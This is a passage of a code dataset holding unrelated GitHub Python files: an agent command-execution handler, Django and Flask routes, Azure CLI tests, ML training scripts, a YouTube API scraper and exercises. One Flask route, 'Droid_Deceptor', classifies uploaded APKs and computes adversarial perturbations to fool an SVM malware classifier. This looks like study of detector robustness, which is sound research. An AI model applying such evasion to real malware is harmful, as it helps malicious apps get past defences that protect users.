List[dict]:\n\n action_name = action['action_name']\n if action_name not in [\"action_execute_command\", \"execute_command\"]:\n return None\n \n logging.info(self.__class__.__name__ )\n \n command = action['command'] \n working_directory = action['working_directory'] \n\n config = container.get(ConfigManager) \n base_path = get_base_path(config, account_name, working_directory)\n\n result = execute_script(command, base_path)\n\n temp = [{\"result\": result},{ \"handler\": self.__class__.__name__} ]\n temp.append(action)\n return temp\n\n \n \n \n\n ","repo_name":"junwin/lucy","sub_path":"src/handlers/command_execution_handler.py","file_name":"command_execution_handler.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70712959513","text":"groups = {\n \"1\": {\"Denmark\", \"England\", \"France\", \"Sweden\"},\n \"2\": {\"CIS\", \"Germany\", \"Netherlands\", \"Scotland\"}\n}\n\nmatches = [\n (\"Sweden\", 1, 1, \"France\"),\n (\"Denmark\", 0, 0, \"England\"),\n (\"Netherlands\", 1, 0, \"Scotland\"),\n (\"CIS\", 1, 1, \"Germany\"),\n (\"France\", 0, 0, \"England\"),\n (\"Sweden\", 1, 0, \"Denmark\"),\n]\n","repo_name":"AnneSpitz/TDLog-TP1","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70357850713","text":"import os\nfrom flask import render_template\nfrom droid_deceptor.controllers.feature_extractor import extract_features\nimport droid_deceptor.controllers.malware_classification as Classifiers\nfrom droid_deceptor.controllers.attacks import Attacks\n\n\ndef generate_attack(features, results):\n attack = Attacks()\n\n attack.model = Classifiers.svm_classifier\n attack.apk_vector = features\n\n adversarial_example = attack.jsma_attack(max_perturbations= 10)\n perturbations = attack.features_names(adversarial_example)\n return perturbations\n\n\ndef get_apk(files):\n UPLOAD_FOLDER = 'droid_deceptor/uploads'\n\n message, uploaded_file, features = None, None, None\n\n # Check if the 'file' field is in the request\n if 'file' not in files:\n message = \"No file Uploaded\"\n\n file = files['file']\n\n # Check if the user submitted an empty file input\n if file.filename == '':\n message = \"No selected file\"\n\n if file:\n # Ensure the folder exists\n os.makedirs(UPLOAD_FOLDER, exist_ok=True)\n\n # Save the uploaded APK file to the UPLOAD_FOLDER\n file.save(os.path.join(UPLOAD_FOLDER, file.filename))\n uploaded_file = file.filename\n message = \"File Saved\"\n\n # extract features\n features = extract_features(file.filename)\n apk_vector = Classifiers.prepare_input(features)\n\n # check if its a malware or not\n results = Classifiers.malware_classifier(apk_vector)\n perturbations = generate_attack(apk_vector, results)\n\n return render_template('upload.html', message=message, uploaded_file=uploaded_file, features=features, results=results, perturbations=perturbations)","repo_name":"Moghees244/Droid_Deceptor","sub_path":"droid_deceptor/controllers/apk_upload.py","file_name":"apk_upload.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3042001064","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"login\", views.login, name=\"login\"),\n path(\"logout\", views.logout, name=\"logout\"),\n path(\"checkout\", views.checkout, name=\"cart\"),\n path(\"logOrder\", views.logOrder, name=\"logOrder\"),\n path(\"deleteOrder\", views.deleteOrder, name=\"deleteOrder\"),\n path(\"paidOrder\", views.paidOrder, name=\"paidOrder\"),\n path(\"viewOrders\", views.viewOrders, name=\"viewOrders\"),\n path(\"updateMenu\", views.updateMenu, name=\"updateMenu\"),\n path(\"addNewItem\", views.addNewItem, name=\"addNewItem\"),\n path(\"removeMenuItem\", views.removeMenuItem, name=\"removeMenuItem\"),\n]\n","repo_name":"DShaulov/CS50-Web-Project-3-PizzaShop","sub_path":"orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40136832158","text":"import os\nimport unittest\n\nfrom azure.cli.testsdk.scenario_tests import AllowLargeResponse\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)\nfrom .recording_processors import KeyReplacer\n\n\nTEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))\n\n\nclass WebpubsubScenarioTest(ScenarioTest):\n\n def __init__(self, method_name):\n super(WebpubsubScenarioTest, self).__init__(\n method_name, recording_processors=[KeyReplacer()]\n )\n\n @ResourceGroupPreparer(random_name_length=20)\n def test_webpubsub(self, resource_group):\n tags_key = 'key'\n tags_val = 'value'\n updated_tags_val = 'value2'\n\n self.kwargs.update({\n 'name': self.create_random_name('webpubsub', 16),\n 'sku': 'Standard_S1',\n 'location': 'eastus',\n 'tags': '{}={}'.format(tags_key, tags_val),\n 'unit_count': 1,\n 'updated_tags': '{}={}'.format(tags_key, updated_tags_val),\n 'updated_sku': 'Free_F1'\n })\n\n # Test create\n self.cmd('webpubsub create -g {rg} -n {name} --tags {tags} -l {location} --sku {sku} --unit-count {unit_count}', checks=[\n self.check('name', '{name}'),\n self.check('location', '{location}'),\n self.check('provisioningState', 'Succeeded'),\n self.check('sku.name', '{sku}'),\n self.check('sku.capacity', '{unit_count}'),\n self.check('tags.{}'.format(tags_key), tags_val),\n self.exists('hostName'),\n self.exists('publicPort'),\n self.exists('serverPort'),\n self.exists('externalIp'),\n ])\n\n # Test show\n self.cmd('webpubsub show -g {rg} -n {name}', checks=[\n self.check('name', '{name}'),\n self.check('location', '{location}'),\n self.check('provisioningState', 'Succeeded'),\n self.check('sku.name', '{sku}'),\n self.check('sku.capacity', '{unit_count}'),\n self.exists('hostName'),\n self.exists('publicPort'),\n self.exists('serverPort'),\n self.exists('externalIp'),\n ])\n\n # Test list\n self.cmd('webpubsub list -g {rg}', checks=[\n self.check('[0].name', '{name}'),\n self.check('[0].location', '{location}'),\n self.check('[0].provisioningState', 'Succeeded'),\n self.check('[0].sku.name', '{sku}'),\n self.check('[0].sku.capacity', '{unit_count}'),\n self.exists('[0].hostName'),\n self.exists('[0].publicPort'),\n self.exists('[0].serverPort'),\n self.exists('[0].externalIp'),\n ])\n\n # Test update\n self.cmd('webpubsub update -g {rg} -n {name} --tags {updated_tags} --sku {updated_sku}', checks=[\n self.check('name', '{name}'),\n self.check('location', '{location}'),\n self.check('provisioningState', 'Succeeded'),\n self.check('sku.name', '{updated_sku}'),\n self.check('tags.{}'.format(tags_key), updated_tags_val),\n self.exists('hostName'),\n self.exists('publicPort'),\n self.exists('serverPort'),\n self.exists('externalIp'),\n ])\n\n # Test key show\n self.cmd('webpubsub key show -n {name} -g {rg}', checks=[\n self.exists('primaryKey'),\n self.exists('secondaryKey')\n ])\n\n # Test list skus\n self.cmd('webpubsub list-skus -n {name} -g {rg}', checks=[\n self.check('[0].sku.name', 'Free_F1'),\n self.check('[1].sku.name', 'Standard_S1')\n ])\n\n # Test list usage\n self.cmd('webpubsub list-usage -l {location}', checks=[\n self.check('[0].name.value', 'FreeTierInstances'),\n self.check('[1].name.value', 'SignalRTotalUnits')\n ])\n\n # Test key regenerate\n self.cmd('webpubsub key regenerate -n {name} -g {rg} --key-type secondary', checks=[\n self.exists('primaryKey'),\n self.exists('secondaryKey')\n ])\n\n # Test key regenerate salt\n self.cmd('webpubsub key regenerate -n {name} -g {rg} --key-type salt', checks=[\n self.exists('primaryKey'),\n self.exists('secondaryKey')\n ])\n\n # Test delete\n count = len(self.cmd('webpubsub list').get_output_in_json())\n self.cmd('webpubsub delete -g {rg} -n {name}')\n final_count = len(self.cmd('webpubsub list').get_output_in_json())\n self.assertTrue(final_count == count - 1)\n","repo_name":"Azure/azure-cli-extensions","sub_path":"src/webpubsub/azext_webpubsub/tests/latest/test_webpubsub_scenario.py","file_name":"test_webpubsub_scenario.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","stars":350,"dataset":"github-code","pt":"5"} +{"seq_id":"26983541849","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\nimport skimage\nfrom skimage import data,exposure\nimport matplotlib.pyplot as plt\n\nclass TOD(object):\n def __init__(self):\n # self.PATH_TO_CKPT = 'D:/models/ssd_mobilenet_v2_coco_2018_03_29/frozen_inference_graph.pb'\n self.PATH_TO_CKPT2 = r'D:\\models\\ssd_mobilenet_v2_coco_2018_03_29\\saved_model'\n self.PATH_TO_LABELS = r'D:\\projects\\tensorflowModelGarden\\research\\object_detection\\data\\mscoco_label_map.pbtxt'\n self.NUM_CLASSES = 90\n\n self.category_index = self._load_label_map()\n\n\n def _load_label_map(self):\n label_map = label_map_util.load_labelmap(self.PATH_TO_LABELS)\n categories = label_map_util.convert_label_map_to_categories(label_map,\n max_num_classes=self.NUM_CLASSES,\n use_display_name=True)\n category_index = label_map_util.create_category_index(categories)\n return category_index\n\n def get_detect_result(self, image):\n\n\n with tf.Session(graph=tf.Graph()) as sess:\n # tf.saved_model.load(sess, [\"serve\"], self.PATH_TO_CKPT2)\n tf.saved_model.load(sess, [\"serving_default\"], self.PATH_TO_CKPT2)\n graph = tf.get_default_graph()\n\n image_np_expanded = np.expand_dims(image, axis=0)\n image_tensor = graph.get_tensor_by_name('image_tensor:0')\n boxes = graph.get_tensor_by_name('detection_boxes:0')\n scores =graph.get_tensor_by_name('detection_scores:0')\n classes = graph.get_tensor_by_name('detection_classes:0')\n num_detections = graph.get_tensor_by_name('num_detections:0')\n # Actual detection.\n\n (boxes, scores, classes, num_detections) = sess.run(\n [boxes, scores, classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n # Visualization of the results of a detection.\n image2 = vis_util.visualize_boxes_and_labels_on_image_array(\n image,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n self.category_index,\n use_normalized_coordinates=True,\n line_thickness=8)\n\n return image2\n\n\n\nif __name__ == '__main__':\n image_ori = cv2.imread(r'D:\\dataset\\traffic_state_predict\\amap_traffic_train_0712\\000001\\1_2019-03-10-18-08-08.jpg')\n\n # cv2.imshow(\"ori\", image_ori)\n # cv2.waitKey(0)\n\n detecotr = TOD()\n image2 = detecotr.get_detect_result(image_ori)\n cv2.imshow(\"detection\", image2)\n cv2.waitKey(0)\n\n\n\n","repo_name":"ljq2278/models","sub_path":"research/my_shell/detect_mobilenet/tf1_predict_useSavedModel.py","file_name":"tf1_predict_useSavedModel.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"23137740218","text":"import time\n\nimport torch\nfrom torch import nn\nimport torch.utils.data as torch_data\nimport torchvision\nimport matplotlib.pyplot as plt\n\nfrom vanilla_autoencoder import AutoEncoder\n\n\ndef sparse_loss_l1(model, images):\n model_children = list(model.children())\n loss = 0\n values = images\n for i in range(len(model_children)):\n values = torch.relu((model_children[i](values)))\n loss += torch.mean(torch.abs(values))\n return loss\n\n\ndef kl_divergence(rho, rho_hat):\n rho_hat = torch.mean(torch.sigmoid(rho_hat), 1)\n rho = torch.tensor([rho] * len(rho_hat)).to(device)\n return torch.sum(rho * torch.log(rho / rho_hat) + (1 - rho) * torch.log(\n (1 - rho) / (1 - rho_hat)))\n\n\ndef sparse_loss_kl(model, images):\n model_children = list(model.children())\n loss = 0\n values = images\n for i in range(len(model_children)):\n values = torch.relu((model_children[i](values)))\n loss += kl_divergence(0.05, values)\n return loss\n\n\ndef fit(model, dataloader, optimizer, lambd):\n model.train()\n running_loss = .0\n counter = 0\n for step, (x, b_label) in enumerate(dataloader):\n counter += 1\n x = x.to(device)\n b_x = x.view(-1, 28 * 28)\n b_y = x.view(-1, 28 * 28)\n optimizer.zero_grad()\n encoded, decoded = model(b_x)\n # loss = nn.MSELoss()(decoded, b_y) + lambd * sparse_loss_l1(model, b_x)\n loss = nn.MSELoss()(decoded, b_y) + lambd * sparse_loss_kl(model, b_x)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n\n epoch_loss = running_loss / counter\n return epoch_loss\n\n\nif __name__ == '__main__':\n # device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n device = 'cpu'\n\n EPOCH = 5\n BATCH_SIZE = 64\n LR = 0.005\n N_TEST_IMG = 5\n\n train_data = torchvision.datasets.MNIST(\n root='datasets/mnist',\n train=True,\n transform=torchvision.transforms.ToTensor(),\n download=True\n )\n\n train_loader = torch_data.DataLoader(\n dataset=train_data,\n batch_size=BATCH_SIZE,\n shuffle=True\n )\n\n model = AutoEncoder()\n\n # train and validate the autoencoder neural network\n train_loss = []\n start = time.time()\n optimizer = torch.optim.Adam(model.parameters(), lr=LR)\n for epoch in range(EPOCH):\n print(f\"Epoch {epoch + 1} of {EPOCH}\")\n train_epoch_loss = fit(model, train_loader, optimizer, 0.001)\n train_loss.append(train_epoch_loss)\n end = time.time()\n\n print(f\"{(end - start) / 60:.3} minutes\")\n # save the trained model\n torch.save(model.state_dict(),\n f\"result/sparse_autoencoder/sparse_ae{EPOCH}.pth\")\n\n plt.figure(figsize=(10, 7))\n plt.plot(train_loss, color='orange', label='train loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n plt.savefig('result/sparse_autoencoder/loss.png')\n plt.show()\n","repo_name":"victoryfb/autoencoders","sub_path":"sparse_autoencoder.py","file_name":"sparse_autoencoder.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71301500632","text":"import json\r\nimport pandas as pd\r\nfrom csv import writer\r\nimport time\r\nfrom urllib.request import urlopen\r\nvid = pd.read_csv(\"vidid.csv\")\r\napi=\"youryoutubeapihere\"\r\ndef yttimeconvert(duration):\r\n day_time = duration.split('T')\r\n day_duration = day_time[0].replace('P', '')\r\n day_list = day_duration.split('D')\r\n if len(day_list) == 2:\r\n day = int(day_list[0]) * 60 * 60 * 24\r\n day_list = day_list[1]\r\n else:\r\n day = 0\r\n day_list = day_list[0]\r\n hour_list = day_time[1].split('H')\r\n if len(hour_list) == 2:\r\n hour = int(hour_list[0]) * 60 * 60\r\n hour_list = hour_list[1]\r\n else:\r\n hour = 0\r\n hour_list = hour_list[0]\r\n minute_list = hour_list.split('M')\r\n if len(minute_list) == 2:\r\n minute = int(minute_list[0]) * 60\r\n minute_list = minute_list[1]\r\n else:\r\n minute = 0\r\n minute_list = minute_list[0]\r\n second_list = minute_list.split('S')\r\n if len(second_list) == 2:\r\n second = int(second_list[0])\r\n else:\r\n second = 0\r\n return day + hour + minute + second\r\ndef main(urs):\r\n url = \"https://youtube.googleapis.com/youtube/v3/videos?part=snippet%2CcontentDetails%2Cstatistics&id=\"+urs+\"&key=\"+api\r\n response = urlopen(url)\r\n json_load = json.loads(response.read())\r\n\r\n try:\r\n vidtitle=json_load['items'][0]['snippet']['title']\r\n except:\r\n vidtitle=\"\"\r\n try:\r\n chanid=json_load['items'][0]['snippet']['channelId']\r\n except:\r\n chanid=\"\"\r\n try:\r\n viddesc=json_load['items'][0]['snippet']['description']\r\n except:\r\n viddesc=\"\"\r\n try:\r\n vidpub=json_load['items'][0]['snippet']['publishedAt']\r\n except:\r\n vidpub=\"\"\r\n try:\r\n channame=json_load['items'][0]['snippet']['channelTitle']\r\n except:\r\n channame=\"\"\r\n try:\r\n vidtags=json_load['items'][0]['snippet']['tags']\r\n except:\r\n vidtags=\"\"\r\n try:\r\n vidcat=json_load['items'][0]['snippet']['categoryId']\r\n except:\r\n vidcat=\"\"\r\n try:\r\n vidlive=json_load['items'][0]['snippet']['liveBroadcastContent']\r\n except:\r\n vidlive=\"\"\r\n try:\r\n vidlang=json_load['items'][0]['snippet']['defaultAudioLanguage']\r\n except:\r\n vidlang=\" \"\r\n try:\r\n viddu=time.strftime(\"%H:%M:%S\",time.gmtime(yttimeconvert(json_load['items'][0]['contentDetails']['duration'])))\r\n except:\r\n viddu=\"\"\r\n try:\r\n vidview=json_load['items'][0]['statistics']['viewCount']\r\n except:\r\n vidview=\"\"\r\n try:\r\n vidlikes=json_load['items'][0]['statistics']['likeCount']\r\n except:\r\n vidlikes=\"\"\r\n try:\r\n vidcom=json_load['items'][0]['statistics']['commentCount']\r\n except:\r\n vidcom=\"\"\r\n try:\r\n vidthumb=json_load['items'][0]['snippet']['thumbnails']['maxres']['url']\r\n except:\r\n vidthumb=json_load['items'][0]['snippet']['thumbnails']['default']['url']\r\n try:\r\n vidid=json_load['items'][0]['id']\r\n except:\r\n vidid=\"\"\r\n df2 = pd.DataFrame([[vidtitle,chanid,viddesc,vidpub,channame,vidtags,vidcat,vidlive,vidlang,viddu,vidview,vidlikes,vidcom,vidthumb,vidid]],columns=['vidtitle','chanid','viddesc','vidpub','channame','vidtags','vidcat','vidlive','vidlang','viddu','vidview','vidlikes','vidcom','vidthumb','vidid'])\r\n return df2\r\n \r\n\r\nfor i in range(0,len(vid.index+1)):\r\n\r\n data = main(str(vid.iloc[i,1]))\r\n print (i)\r\n print(data)\r\n data.to_csv(\"exdata.csv\", mode='a', header=False, index=False)\r\n time.sleep(1)\r\n","repo_name":"Vanshbordia/youtubedataresearch","sub_path":"dataextractor.py","file_name":"dataextractor.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34716207878","text":"# x = {'a': 10, 'b': 20, 'c': 30, 'd': 40}\n# x.setdefault('e')\n# print(x)\n\n# # update(키=값)은 키가 문자열일 때만 사용할 수 있습니다. 만약 키가 숫자일 경우에는 update(딕셔너리)처럼 딕셔너리를 넣어서 값을 수정할 수 있습니다.\n# x.update(e=90)\n# print(x)\n\nkeys = ['a', 'b', 'c', 'd']\n# x = dict.fromkeys(keys, 900)\n# print(x)\n# print(x.get(\"a\"))\n\n# make dictionary out of list\na = {key: value for key, value in dict.fromkeys(keys).items() if value != 20}\n\nprint(a)\nterrestrial_planet = {\n 'Mercury': {\n 'mean_radius': 2439.7,\n 'mass': 3.3022E+23,\n 'orbital_period': 87.969\n },\n 'Venus': {\n 'mean_radius': 6051.8,\n 'mass': 4.8676E+24,\n 'orbital_period': 224.70069,\n },\n 'Earth': {\n 'mean_radius': 6371.0,\n 'mass': 5.97219E+24,\n 'orbital_period': 365.25641,\n },\n 'Mars': {\n 'mean_radius': 3389.5,\n 'mass': 6.4185E+23,\n 'orbital_period': 686.9600,\n }\n}\nprint(terrestrial_planet[\"Venus\"][\"mean_radius\"])\n\n\nx = {'a': 0, 'b': 0, 'c': 0, 'd': 0}\ny = x.copy()\ny[\"a\"] = 90\nprint(y)\n\nmaria = {'korean': 94, 'english': 91, 'mathematics': 89, 'science': 83}\n\naverage = sum(maria.values())/len(maria)\n\nprint(average)\n\n\nkeys = input().split()\nvalues = map(int, input().split())\nx = dict(zip(keys, values))\n# del x[\"delta\"]\na = {key: value for key, value in x.items() if value != 30 and key != \"delta\"}\nprint(a)\n","repo_name":"gchin97/python-stamp","sub_path":"25.0.py","file_name":"25.0.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20000013929","text":"class Solution(object):\n def countBattleships(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: int\n \"\"\"\n result = 0\n m = len(board)\n n = len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == 'X':\n result += 1\n\n if i != 0 and board[i - 1][j] == 'X': # vertical\n result -= 1\n if j != 0 and board[i][j - 1] == 'X': # horizontal\n result -= 1\n\n return result\n","repo_name":"hansxiao7/leetcode-python","sub_path":"0419--Battleships in a Board/solution2-one pass.py","file_name":"solution2-one pass.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"72788061593","text":"#!~miniconda3/envs/pytorch/bin python\n# from __future__ import print_function\n\nimport numpy as np\nimport Src.Utils.utils as utils\nfrom Src.NS_parser import Parser\nfrom Src.config import Config\nfrom time import time\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport pandas as pd\nimport logging\nimport pickle\nfrom Src.Algorithms import NS_utils\nimport torch\nimport seaborn as sns\nfrom os import path\nfrom scipy import stats\n\n\ndef animate(n, *fargs):\n trajectories = fargs[0]\n line = fargs[1]\n line.set_xdata(trajectories[:n, 0])\n line.set_ydata(trajectories[:n, 1])\n return line\n\nclass Solver:\n def __init__(self, config):\n # Initialize the required variables\n\n self.config = config\n self.env = self.config.env\n self.state_dim = np.shape(self.env.reset())[0]\n\n if len(self.env.action_space.shape) > 0:\n self.action_dim = self.env.action_space.shape[0]\n else:\n self.action_dim = self.env.action_space.n\n print(\"Actions space: {} :: State space: {}\".format(self.action_dim, self.state_dim))\n\n self.model = config.algo(config=config)\n\n\n def train(self):\n # Learn the model on the environment\n return_history = []\n action_dict = {0: 'up', 1: 'right', 2: 'down', 3: 'left'}\n reached_destination = []\n reached_count = 0\n discounted_return_history = np.zeros(self.config.max_episodes)\n episode_length = np.zeros(self.config.max_episodes)\n success_vector = np.zeros(self.config.max_episodes)\n prowls_prediction = np.zeros(self.config.max_episodes)\n\n\n logging.basicConfig(filename='log_trial.log', encoding='utf-8', level=logging.DEBUG)\n logging.debug('START TRIAL \\n')\n\n E = self.config.max_episodes\n H = self.env.max_horizon\n #actions = np.empty((self.config.max_episodes, self.env.max_horizon), dtype=object)\n #action_probs = np.zeros((self.config.max_episodes, self.env.max_horizon, 4))\n #states = np.zeros((self.config.max_episodes, self.env.max_horizon+1, 2))\n #rewards = np.zeros((self.config.max_episodes, self.env.max_horizon))\n #target_pos = np.zeros((self.config.max_episodes, self.env.max_horizon, 4))\n\n\n ckpt = self.config.save_after\n rm_history, regret, rm, start_ep = [], 0, 0, 0\n\n windDir = \"right\"\n targetPos = [0, 0]\n\n steps = 0\n t0 = time()\n for episode in range(start_ep, self.config.max_episodes):\n logging.debug(\"EPISODE {}\\n\\n\".format(episode))\n\n # RESET ENV AND MODEL\n state = self.env.reset()\n\n if self.config.env_name == 'NS_Wind':\n if windDir != self.env.direction or episode == self.config.max_episodes-1:\n with open(\"{}_Model_wind_{}_seed_{}\".format(self.config.algo_name, windDir, self.config.seed),\n \"wb\") as file_:\n pickle.dump(self.model, file_, -1)\n windDir = self.env.direction\n elif self.config.env_name == 'NS_Target':\n if targetPos != self.env.target or episode == self.config.max_episodes-1:\n with open(\"{}_Model_Target_{}_seed_{}\".format(self.config.algo_name, self.fromTargetToStr(targetPos), self.config.seed),\n \"wb\") as file_:\n pickle.dump(self.model, file_, -1)\n targetPos = self.env.target\n #newActor, _, _ = NS_utils.get_Policy(state_dim=2, config=self.config)\n #self.model.modules[0] = ('actor', newActor)\n\n self.model.reset()\n\n logging.debug(\"Initial State: {}\".format(state))\n\n step, total_r = 0, 0\n discount = 1\n gamma_t = self.config.gamma\n done = False\n trajectories = np.zeros((self.config.max_steps, 2))\n plotTraj = False\n while not done:\n # self.env.render(mode='human')\n logging.debug(\"Step: {} \\n\".format(step))\n\n if plotTraj:\n trajectories[step, :] = state\n\n # GET ACTION\n action, extra_info, dist = self.model.get_action(state)\n\n #states[episode, step] = self.env.curr_pos\n #actions[episode, step] = action_dict[action]\n #action_probs[episode, step] = dist\n\n logging.debug(\"State: {}\".format(self.env.curr_pos))\n logging.debug(\"Action chosen: {}\".format(action_dict[action]))\n logging.debug(\"Actions probabilities (up, right, down, left): {}\".format(dist))\n\n # STEP\n new_state, reward, done, info = self.env.step(action=action)\n\n if reward > 0:\n success_vector[episode] = 1\n\n logging.debug(\"Went to: {}\".format(self.env.curr_pos))\n logging.debug(\"Reward: {}\".format(reward))\n\n if reward == 29.5:\n logging.debug(\"DESTINATION REACHED IN {} STEPS\".format(step))\n\n logging.debug(\"\\n\\n\\n\")\n\n #rewards[episode, step] = reward # this is not discounted\n #target_pos[episode, step] = self.env.G1\n #if done:\n #states[episode, step+1] = self.env.curr_pos\n\n # UPDATE MODEL\n self.model.update(state, action, extra_info, reward, new_state, done)\n #prowls_prediction[episode:episode + self.config.delta] = self.model.prediction\n state = new_state\n\n # Tracking intra-episode progress\n total_r += reward\n discounted_return_history[episode] += reward * discount\n discount *= gamma_t\n # regret += (reward - info['Max'])\n step += 1\n if step >= self.config.max_steps:\n break\n\n if plotTraj:\n fig = plt.figure()\n ax = plt.axes(xlim=(0, 1), ylim=(0, 1))\n line, = ax.plot([], [], lw=2)\n ep_traj = np.reshape(trajectories[np.logical_and.reduce(trajectories[:, :] != [0, 0], axis=1), :],\n (-1, 2))\n # print(ep_traj.shape)\n # print(ep_traj)\n\n target = plt.Rectangle((0.45, 0.9), 0.1, 0.1, fc='red')\n ax.add_patch(target)\n anim = FuncAnimation(fig, animate, interval=200, fargs=(ep_traj, line))\n plt.show(block=False)\n plt.pause(3)\n plt.close()\n\n # track inter-episode progress\n episode_length[episode] = step\n steps += step\n rm += total_r\n '''if total_r > 0 and episode >= 0.9 * self.config.max_episodes:\n reached_destination.append(True)\n reached_count += 1\n elif total_r <= 0 and episode >= 0.9 * self.config.max_episodes:\n reached_destination.append(False)'''\n\n if episode%ckpt == 0 or episode == self.config.max_episodes-1:\n rm_history.append(rm)\n return_history.append(total_r)\n\n print(\"{} :: Rewards {:.3f} :: steps: {:.2f} :: Time: {:.3f}({:.5f}/step) :: Entropy : {:.3f} :: Grads : {}\".\n format(episode, rm, steps/ckpt, (time() - t0)/ckpt, (time() - t0)/steps, self.model.entropy, self.model.get_grads()))\n\n # self.model.save()\n #utils.save_plots(return_history, config=self.config, name='{}_rewards'.format(self.config.seed))\n\n t0 = time()\n steps = 0\n\n # every 100 episodes set exploration to 0 and plot 10 trajectories\n trajectories = np.zeros((10, self.config.max_steps, 2))\n if False:\n #if episode % 100 == 0 and episode != 0 or episode == self.config.max_episodes-1:\n\n print(\"Project a few episodes without exploration epsilon.\")\n #self.env.randomness = 0\n #self.model.state_features.eval()\n #self.model.actor.eval()\n\n # layers_before = [x.data for x in self.model.state_features.net.parameters()]\n #layers_before = [x.data for x in self.model.actor.fc1.parameters()]\n # print(\"Before: {}\".format(layers_before))\n\n for i in range(2):\n state = self.env.reset()\n self.env.episode -= 1\n self.env.curr_pos = np.array([np.random.randint(2,9) / 10, 0.5])\n self.env.curr_state = self.env.make_state()\n state = self.env.make_state()\n\n #self.model.reset()\n\n step_test = 0\n done = False\n while not done:\n trajectories[i,step_test,:] = state\n\n action, extra_info, dist = self.model.get_action(state)\n\n action = np.argmax(dist)\n #print(action)\n # STEP\n new_state, reward, done, info = self.env.step(action=action)\n # UPDATE MODEL\n # self.model.update(state, action, extra_info, reward, new_state, done)\n state = new_state\n step_test += 1\n #print(trajectories[i,:,:])\n\n if step_test >= self.config.max_steps:\n break\n\n fig = plt.figure()\n ax = plt.axes(xlim=(0, 1), ylim=(0, 1))\n line, = ax.plot([], [], lw=2)\n ep_traj = np.reshape(trajectories[i,np.logical_and.reduce(trajectories[i,:,:] != [0,0], axis =1), :], (-1,2))\n #print(ep_traj.shape)\n #print(ep_traj)\n\n target = plt.Rectangle((0.475, 0.925), 0.05, 0.05, fc='red')\n ax.add_patch(target)\n anim = FuncAnimation(fig, animate, interval=200, fargs=(ep_traj, line))\n plt.show(block=False)\n plt.pause(3)\n plt.close()\n\n #self.env.randomness = 0.25\n #self.model.state_features.train()\n #self.model.actor.train()\n\n #layers_after = [x.data for x in self.model.state_features.net.parameters()]\n layers_after = [x.data for x in self.model.actor.fc1.parameters()]\n #print(\"After: {}\".format(layers_after))\n #print(torch.equal(layers_before[0], layers_after[0]))\n #print(torch.equal(layers_before[1], layers_after[1]))\n print(\"Finished plotting.\")\n\n prediction_error = np.abs(discounted_return_history - prowls_prediction)\n #np.save(\"prediction_error_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name,\n # self.config.speed,\n # self.config.seed),\n # prediction_error)\n #np.save(\"predicted_return_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name,\n # self.config.speed,\n # self.config.seed),\n # prowls_prediction)\n np.save(\"disc_return_history_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name,\n self.config.speed,\n self.config.seed,), discounted_return_history)\n\n np.save(\"episode_length_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name, self.config.speed, self.config.seed),\n episode_length)\n\n np.save(\"episode_success_alg_{}_speed_{}_seed_{}\".format(self.config.algo_name, self.config.speed, self.config.seed),\n success_vector)\n\n #success_rate = reached_count / len(reached_destination)\n\n #print(\"Success rate: {}\".format(success_rate))\n\n ## convert your array into a dataframe\n #heatmap = pd.DataFrame(self.env.heatmap)\n '''actions = pd.DataFrame(actions)\n states = pd.DataFrame(np.reshape(states, (E*(H+1),-1)))\n action_probs = pd.DataFrame(np.reshape(action_probs, (E*H,-1)))\n rewards = pd.DataFrame(rewards)\n target_pos = pd.DataFrame(np.reshape(target_pos, (E*H,-1)))'''\n\n ## save to xlsx file\n\n '''actions_filepath = 'actions_{}.xlsx'.format(self.config.max_episodes)\n states_filepath = 'states_{}.xlsx'.format(self.config.max_episodes)\n action_probs_filepath = 'action_probs_{}.xlsx'.format(self.config.max_episodes)\n rewards_filepath = 'rewards_{}.xlsx'.format(self.config.max_episodes)\n target_pos_filepath = 'target_pos_{}.xlsx'.format(self.config.max_episodes)'''\n #heat_path = 'heatmap.xlsx'\n\n #heatmap.to_excel(heat_path, index=False)\n '''actions.to_excel(actions_filepath, index=False)\n states.to_excel(states_filepath, index=False)\n action_probs.to_excel(action_probs_filepath, index=False)\n rewards.to_excel(rewards_filepath, 